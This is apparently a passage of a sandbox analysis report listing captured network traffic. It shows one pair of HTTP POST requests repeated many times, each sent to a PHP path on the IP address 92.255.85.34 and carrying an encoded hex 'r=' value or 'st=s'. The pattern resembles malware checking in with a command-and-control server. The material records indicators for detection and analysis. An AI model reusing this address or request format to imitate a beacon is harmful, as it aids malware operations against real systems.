Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
